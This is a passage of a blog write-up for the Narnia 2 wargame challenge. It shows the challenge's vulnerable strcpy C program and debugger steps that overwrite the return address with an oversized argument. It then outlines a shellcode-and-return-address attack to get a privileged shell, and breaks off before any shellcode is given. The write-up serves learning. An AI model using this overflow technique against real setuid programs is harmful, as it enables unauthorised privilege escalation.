{"id":554,"date":"2023-03-06T09:52:31","date_gmt":"2023-03-06T08:52:31","guid":{"rendered":"https:\/\/mindshield.eu\/?p=554"},"modified":"2023-03-23T15:03:45","modified_gmt":"2023-03-23T14:03:45","slug":"narnia-2","status":"publish","type":"post","link":"https:\/\/mindshield.eu\/index.php\/2023\/03\/06\/narnia-2\/","title":{"rendered":"\ud83e\udd81Narnia 2"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"554\" class=\"elementor elementor-554\" data-elementor-post-type=\"post\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-57fc76cd elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"57fc76cd\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-58b8ea31\" data-id=\"58b8ea31\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-19be204b elementor-widget elementor-widget-text-editor\" data-id=\"19be204b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>As usual, we meet again for the 3rd challenge of this Narnia series.<\/p>\n<p>We are going to discover a new tool that is essential for this challenge, and also deepen knowledge covered in the previous challenges.<\/p>\n<h2 class=\"wp-block-heading\">Discovery<\/h2>\n<p>Here is the source code of the narnia2 program:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-641c1ea elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"641c1ea\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1f4352d\" data-id=\"1f4352d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-12447c7 elementor-widget elementor-widget-code-highlight\" data-id=\"12447c7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-c line-numbers\">\n\t\t\t\t<code readonly=\"true\" class=\"language-c\">\n\t\t\t\t\t<xmp>#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\nint main(int argc, char * argv[]){\r\n    char buf[128]; // a 128-byte stack buffer\r\n\r\n    if(argc == 1){\r\n        printf(\"Usage: %s argument\\n\", argv[0]);\r\n        exit(1);\r\n    }\r\n    strcpy(buf,argv[1]); // no length check: an argument longer than 127 bytes overflows buf\r\n    printf(\"%s\", buf);\r\n\r\n    return 0;\r\n}<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element 
elementor-element-3fef89c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3fef89c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-727cb4d\" data-id=\"727cb4d\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a7119ca elementor-widget elementor-widget-text-editor\" data-id=\"a7119ca\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>Here, the bug to exploit is not visible at first glance.<\/p>\n<p>You should know that <code>strcpy<\/code> is a <b>deprecated<\/b> function because it is vulnerable to buffer overflow: it has no way to <b>check the size of the destination buffer.<\/b><\/p>\n<p>We can therefore inject more characters than the <code>buf<\/code> variable can hold during the <code>strcpy<\/code>.<\/p>\n<p>To analyse how it works in more detail, I used <code>peda-gdb<\/code>. 
It is a debugger that lets you disassemble a program to understand what is happening inside it.<\/p>\n<p>&nbsp;<\/p>\n<p>We launch it by typing the command:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-ce13aea elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"ce13aea\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-4aacf44\" data-id=\"4aacf44\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-33f8693 elementor-widget elementor-widget-code-highlight\" data-id=\"33f8693\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>peda<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-71fa758 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"71fa758\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column 
elementor-col-100 elementor-top-column elementor-element elementor-element-270c06c\" data-id=\"270c06c\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7e84193 elementor-widget elementor-widget-text-editor\" data-id=\"7e84193\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>We select the file to execute:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-2853294 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"2853294\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-feee455\" data-id=\"feee455\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-f087b3a elementor-widget elementor-widget-code-highlight\" data-id=\"f087b3a\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>file 
\/narnia\/narnia2<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-aac2f3f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"aac2f3f\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-409572f\" data-id=\"409572f\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-e5dde30 elementor-widget elementor-widget-text-editor\" data-id=\"e5dde30\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>We set the arguments that we are going to inject into the function like this:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-665e296 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"665e296\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-db6f38b\" data-id=\"db6f38b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element 
elementor-element-a3f0851 elementor-widget elementor-widget-code-highlight\" data-id=\"a3f0851\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>pset arg '\"A\"*135'<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-20fc522 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"20fc522\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1fe2c8b\" data-id=\"1fe2c8b\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-bec604e elementor-widget elementor-widget-text-editor\" data-id=\"bec604e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>We set a breakpoint (otherwise the program would run straight through to the end and we would not be able to see what is happening):<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-a21f54c elementor-section-boxed elementor-section-height-default 
elementor-section-height-default\" data-id=\"a21f54c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5fcd0c8\" data-id=\"5fcd0c8\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-91ad00f elementor-widget elementor-widget-code-highlight\" data-id=\"91ad00f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>break *main<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-517c8fe elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"517c8fe\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c6edc88\" data-id=\"c6edc88\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-d963ac2 elementor-widget elementor-widget-text-editor\" data-id=\"d963ac2\" data-element_type=\"widget\" data-e-type=\"widget\" 
data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>And finally we start the program:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-959f514 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"959f514\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-0e66b88\" data-id=\"0e66b88\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-47451b1 elementor-widget elementor-widget-code-highlight\" data-id=\"47451b1\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"code-highlight.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"prismjs-okaidia copy-to-clipboard \">\n\t\t\t<pre data-line=\"\" class=\"highlight-height language-bash \">\n\t\t\t\t<code readonly=\"true\" class=\"language-bash\">\n\t\t\t\t\t<xmp>start<\/xmp>\n\t\t\t\t<\/code>\n\t\t\t<\/pre>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-b1b11f5 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"b1b11f5\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column 
elementor-element elementor-element-6477574\" data-id=\"6477574\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-0fb2657 elementor-widget elementor-widget-text-editor\" data-id=\"0fb2657\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>The program then waits for us to step through the instructions one at a time with the <code>n<\/code> key followed by Enter.<\/p>\n<p>\u00a0<\/p>\n<p>The image below shows the result of these operations:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-8e8b20c elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"8e8b20c\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-f7a71ae\" data-id=\"f7a71ae\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-dfb5d57 elementor-widget elementor-widget-image\" data-id=\"dfb5d57\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img fetchpriority=\"high\" decoding=\"async\" width=\"704\" height=\"566\" src=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/Untitled.png\" class=\"attachment-large size-large wp-image-559\" alt=\"\" 
srcset=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/Untitled.png 704w, https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/Untitled-300x241.png 300w\" sizes=\"(max-width: 704px) 100vw, 704px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-135c5e3 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"135c5e3\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b519d72\" data-id=\"b519d72\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-654cb61 elementor-widget elementor-widget-text-editor\" data-id=\"654cb61\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>If this is your first time using a debugger, don't panic!<\/p>\n<p>\u00a0<\/p>\n<p>The display may look intimidating at first, but it is actually fairly intuitive:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-88282cc elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"88282cc\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column 
elementor-col-100 elementor-top-column elementor-element elementor-element-ef1c7c0\" data-id=\"ef1c7c0\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-4485e80 elementor-widget elementor-widget-image\" data-id=\"4485e80\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"704\" height=\"566\" src=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/peda-1.png\" class=\"attachment-large size-large wp-image-558\" alt=\"\" srcset=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/peda-1.png 704w, https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/peda-1-300x241.png 300w\" sizes=\"(max-width: 704px) 100vw, 704px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-e7c504b elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"e7c504b\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c935584\" data-id=\"c935584\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-011237b elementor-widget elementor-widget-text-editor\" data-id=\"011237b\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>In the program, we are at the <code>strcpy<\/code> instruction (boxed in red).<\/p>\n<p>On the stack, we can clearly see the \u201c<strong>A<\/strong>\u201d repeated 135 times (that is, 7 more than <code>buf<\/code> can hold) (boxed in red).<\/p>\n<p>I step through the instructions until the <code>ret<\/code>:<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-cb43324 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"cb43324\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-417dc71\" data-id=\"417dc71\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-837ffc6 elementor-widget elementor-widget-image\" data-id=\"837ffc6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" width=\"729\" height=\"435\" 
src=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/peda-2-1.png\" class=\"attachment-large size-large wp-image-557\" alt=\"\" srcset=\"https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/peda-2-1.png 729w, https:\/\/mindshield.eu\/wp-content\/uploads\/2023\/02\/peda-2-1-300x179.png 300w\" sizes=\"(max-width: 729px) 100vw, 729px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-e64de12 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"e64de12\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2f94ba3\" data-id=\"2f94ba3\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-54392c9 elementor-widget elementor-widget-text-editor\" data-id=\"54392c9\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>We can see that the value of <strong>EIP<\/strong> has been modified. While it is supposed to contain the memory address of the next instruction, it now contains a string of 3 \u201c<strong>A<\/strong>\u201d.<\/p>\n<p>So, at the <code>ret<\/code>, when the program wants to go to the next instruction, it refers to <strong>EIP<\/strong>. 
But the new address is not valid.<\/p>\n<p>This is what causes the <code>Segmentation Fault<\/code>.<\/p>\n<p>To solve this challenge, we will therefore need to take control of <strong>EIP<\/strong> to make it execute our own code. This is the principle of a <code>Stack Overflow<\/code> attack.<\/p>\n<p>So, to solve this challenge, we need to inject:<\/p>\n<p>\u00a0<\/p>\n<ul>\n<li>Characters to fill the buffer;<\/li>\n<li>A shellcode;<\/li>\n<li>The return address, which will be the address of the start of the shellcode.<\/li>\n<\/ul>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-f8ef2b5 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"f8ef2b5\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1e4f676\" data-id=\"1e4f676\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-695cdf7 elementor-widget elementor-widget-heading\" data-id=\"695cdf7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<h3 class=\"elementor-heading-title elementor-size-default\">Building the shellcode<\/h3>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-d10ca7a 
elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"d10ca7a\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-b21ea41\" data-id=\"b21ea41\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-e4b94a5 elementor-widget elementor-widget-text-editor\" data-id=\"e4b94a5\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p>First, as seen in the previous article, to build a shellcode you must start by writing an assembly program.<\/p><p>The program must contain:<\/p><ol>\n<li>The execution of a call that uses the <code>sticky bit<\/code> to escalate privileges<\/li>\n<li>The execution of a call that runs <code>\/bin\/sh<\/code><\/li>\n<\/ol>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-653a2c8 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"653a2c8\" data-element_type=\"section\" data-e-type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-45d6a38\" data-id=\"45d6a38\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div 
